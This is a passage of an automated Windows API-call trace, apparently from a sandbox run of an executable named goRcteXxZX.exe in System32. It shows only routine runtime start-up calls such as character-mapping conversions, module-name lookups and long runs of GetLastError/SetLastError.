(dwErrCode=0x0) [0035.939] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f85c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.939] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f85c, cbMultiByte=256, lpWideCharStr=0x16f1b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.939] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.939] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16efa8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.939] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x16f65c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿFw¡õ\x94ù\x16", lpUsedDefaultChar=0x0) returned 256 [0035.939] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.939] GetLastError () returned 0x0 [0035.939] SetLastError (dwErrCode=0x0) [0035.939] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.940] GetLastError () returned 0x0 [0035.940] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.941] SetLastError (dwErrCode=0x0) [0035.941] GetLastError () returned 0x0 [0035.948] SetLastError (dwErrCode=0x0) [0035.948] GetLastError () returned 0x0 [0035.948] SetLastError (dwErrCode=0x0) [0035.948] GetLastError () returned 0x0 [0035.948] SetLastError (dwErrCode=0x0) [0035.948] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.949] SetLastError (dwErrCode=0x0) [0035.949] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.950] GetLastError () returned 0x0 [0035.950] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.951] GetLastError () returned 0x0 [0035.951] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.952] GetLastError () returned 0x0 [0035.952] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.953] GetLastError () returned 0x0 [0035.953] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.954] SetLastError (dwErrCode=0x0) [0035.954] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.955] GetLastError () returned 0x0 [0035.955] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.956] GetLastError () returned 0x0 [0035.956] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.957] GetLastError () returned 0x0 [0035.957] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.958] SetLastError (dwErrCode=0x0) [0035.958] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.959] SetLastError (dwErrCode=0x0) [0035.959] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.960] GetLastError () returned 0x0 [0035.960] SetLastError (dwErrCode=0x0) [0035.961] GetLastError () returned 0x0 [0035.961] SetLastError (dwErrCode=0x0) [0035.961] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.961] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.961] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9d8 | out: lpSystemTimeAsFileTime=0x16f9d8*(dwLowDateTime=0xe31f49d0, dwHighDateTime=0x1d3dfba)) [0035.962] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f910, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.962] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f7f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.962] GetLastError () returned 0x0 [0035.962] GetLastError () returned 0x0 [0035.962] GetLastError () returned 0x0 [0035.962] GetLastError () returned 0x0 [0035.962] GetLastError () returned 0x0 [0035.962] GetLastError () returned 0x0 [0035.962] GetLastError () returned 0x0 [0035.962] GetLastError () returned 0x0 [0035.962] GetLastError () returned 0x0 [0035.962] GetLastError () returned 0x0 [0035.963] GetLastError () returned 0x0 [0035.963] GetLastError () returned 0x0 [0035.963] GetLastError () returned 0x0 [0035.963] GetLastError () returned 0x0 [0035.963] GetLastError () returned 0x0 [0035.963] GetLastError () returned 0x0 [0035.963] GetLastError () returned 0x0 [0035.963] GetLastError () 